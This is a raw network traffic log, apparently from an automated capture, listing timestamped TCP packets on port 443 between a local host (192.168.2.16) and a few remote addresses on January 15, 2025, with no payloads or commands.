                                                                                                                                            Jan 15, 2025 19:14:32.807183981 CET44349710104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.807240009 CET44349710104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.807245016 CET49710443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.807250977 CET44349710104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.807295084 CET49710443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.807375908 CET44349710104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.807434082 CET49710443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.807437897 CET44349710104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.807450056 CET44349710104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.807485104 CET49710443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.807496071 CET44349710104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.807540894 CET49710443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.807552099 CET44349710104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.807590961 CET49710443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.808217049 CET44349710104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.808271885 CET44349710104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.808285952 CET49710443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.808291912 CET44349710104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.808315039 CET49710443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.808361053 CET44349710104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.808413029 CET49710443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.808438063 CET49710443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.808449030 CET44349710104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.808738947 CET49734443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.808760881 CET44349734104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.808831930 CET49734443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.809144974 CET49734443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.809171915 CET44349734104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.810201883 CET44349721104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.810280085 CET49721443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:32.810286045 CET44349721104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.810358047 CET44349721104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.810401917 CET49721443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:32.810406923 CET44349721104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.811709881 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.811798096 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.811830044 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.811857939 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.811883926 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.811918974 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.811973095 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.812032938 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.812174082 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.812237978 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.812546015 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.812637091 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.812658072 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.812719107 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.812741995 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.812799931 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.813177109 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.813242912 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.813262939 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.813327074 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.813529968 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.813601971 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.813637018 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.813699007 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.814094067 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.814162970 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.814212084 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.814282894 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.814304113 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.814361095 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.814410925 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.814466953 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.815058947 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.815129042 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.815157890 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.815221071 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.815253973 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.815340996 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.815356970 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.815412045 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.816668034 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.816711903 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.816736937 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.816768885 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.816797018 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.816801071 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.816898108 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.816910982 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.816965103 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.853307962 CET49721443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:32.892117977 CET44349721104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.892326117 CET44349721104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.892390966 CET49721443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:32.892406940 CET44349721104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.892512083 CET44349721104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.892559052 CET49721443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:32.892564058 CET44349721104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.893040895 CET44349721104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.893096924 CET49721443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:32.893101931 CET44349721104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.893187046 CET44349721104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.893229008 CET49721443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:32.893233061 CET44349721104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.893801928 CET44349721104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.893857956 CET49721443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:32.893862963 CET44349721104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.894593000 CET44349721104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.894658089 CET49721443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:32.894663095 CET44349721104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.894768953 CET44349721104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.894819021 CET49721443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:32.894824028 CET44349721104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.894912004 CET44349721104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.894958973 CET49721443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:32.894963980 CET44349721104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.895545959 CET44349721104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.895605087 CET49721443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:32.895610094 CET44349721104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.895720959 CET44349721104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.895765066 CET49721443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:32.895770073 CET44349721104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.896256924 CET44349721104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.896308899 CET49721443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:32.896444082 CET49721443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:32.896457911 CET44349721104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.900531054 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.900602102 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.900630951 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.900651932 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.900698900 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.900731087 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.900738001 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.900738001 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.900788069 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.900808096 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.900829077 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.900860071 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.900873899 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.900904894 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.900926113 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.900968075 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.900989056 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.901002884 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.901034117 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.901226044 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.901268005 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.901309013 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.901324034 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.901356936 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.901520014 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.901567936 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.901587963 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.901602983 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.901632071 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.902128935 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.902167082 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.902195930 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.902209997 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.902236938 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.902681112 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.902728081 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.902765989 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.902779102 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.902807951 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.902873039 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.902913094 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.902944088 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.902956963 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.902983904 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.943909883 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.943944931 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.944262028 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.944262981 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.944329023 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.985852957 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.985922098 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.985970974 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.986043930 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.986083984 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.986094952 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.986103058 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.986164093 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.987144947 CET49713443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.987174034 CET44349713104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.987380028 CET49736443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.987412930 CET44349736104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.987476110 CET49736443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.988015890 CET49736443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:32.988027096 CET44349736104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.992742062 CET49737443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:32.992834091 CET44349737104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.992919922 CET49737443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:32.993109941 CET49737443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:32.993145943 CET44349737104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.037807941 CET44349724104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.038152933 CET49724443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:33.038212061 CET44349724104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.039803982 CET44349724104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.039823055 CET44349725104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.040101051 CET49725443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:33.040160894 CET44349725104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.040328026 CET49724443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:33.040453911 CET49724443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:33.040466070 CET44349724104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.040524960 CET44349724104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.041627884 CET44349725104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.041719913 CET49725443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:33.042071104 CET49725443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:33.042162895 CET44349725104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.042207956 CET49725443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:33.048894882 CET44349726104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.049133062 CET49726443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:33.049196005 CET44349726104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.050656080 CET44349726104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.050735950 CET49726443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:33.050990105 CET49726443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:33.051086903 CET44349726104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.051100016 CET49726443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:33.083336115 CET44349725104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.091377020 CET44349726104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.092310905 CET49724443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:33.092432976 CET49725443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:33.092494011 CET44349725104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.092559099 CET49726443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:33.092576981 CET44349726104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.122332096 CET44349728104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.122566938 CET49728443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:33.122612953 CET44349728104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.123050928 CET44349728104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.123336077 CET49728443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:33.123425961 CET44349728104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.123442888 CET49728443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:33.140415907 CET49725443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:33.140866995 CET49726443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:33.145627022 CET44349729104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.145845890 CET49729443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:33.145859957 CET44349729104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.146930933 CET44349729104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.147233963 CET49729443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:33.147327900 CET49729443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:33.147433996 CET44349729104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.167367935 CET44349728104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.172298908 CET49728443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:33.180282116 CET4434972716.15.184.174192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.180484056 CET49727443192.168.2.1616.15.184.174
                                                                                                                                            Jan 15, 2025 19:14:33.180496931 CET4434972716.15.184.174192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.181592941 CET44349724104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.181740999 CET44349724104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.181818008 CET49724443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:33.181878090 CET44349724104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.181912899 CET4434972716.15.184.174192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.181972027 CET49727443192.168.2.1616.15.184.174
                                                                                                                                            Jan 15, 2025 19:14:33.181983948 CET44349724104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.182050943 CET49724443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:33.182065010 CET44349724104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.182157040 CET44349724104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.182235003 CET49724443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:33.182245970 CET44349724104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.182270050 CET49727443192.168.2.1616.15.184.174
                                                                                                                                            Jan 15, 2025 19:14:33.182344913 CET4434972716.15.184.174192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.182375908 CET44349724104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.182440996 CET49724443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:33.182452917 CET44349724104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.182552099 CET44349724104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.182575941 CET49727443192.168.2.1616.15.184.174
                                                                                                                                            Jan 15, 2025 19:14:33.182580948 CET4434972716.15.184.174192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.182616949 CET49724443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:33.182627916 CET44349724104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.188314915 CET49729443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:33.209609032 CET44349725104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.209846973 CET44349725104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.209960938 CET49725443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:33.210506916 CET49725443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:33.210567951 CET44349725104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.216557980 CET44349731104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.216788054 CET49731443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:33.216805935 CET44349731104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.218295097 CET44349731104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.218595982 CET49731443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:33.218683004 CET49731443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:33.218782902 CET44349731104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.223722935 CET44349730104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.223943949 CET49730443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:33.223959923 CET44349730104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.224272966 CET44349730104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.224565029 CET49730443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:33.224623919 CET44349730104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.224678040 CET49730443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:33.227154970 CET44349726104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.227279902 CET44349726104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.227360964 CET49726443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:33.227423906 CET44349726104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.227524996 CET44349726104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.227591038 CET49726443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:33.227610111 CET44349726104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.227694988 CET44349726104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.227750063 CET49726443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:33.227763891 CET44349726104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.227879047 CET44349726104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.227936029 CET49726443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:33.227966070 CET44349726104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.228015900 CET44349726104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.228070974 CET49726443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:33.228115082 CET49726443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:33.228142023 CET44349726104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.235296965 CET49724443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:33.235311031 CET44349724104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.235373020 CET49727443192.168.2.1616.15.184.174
                                                                                                                                            Jan 15, 2025 19:14:33.264381886 CET44349732104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.264693022 CET49732443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:33.264753103 CET44349732104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.266406059 CET44349732104.18.69.40192.168.2.16
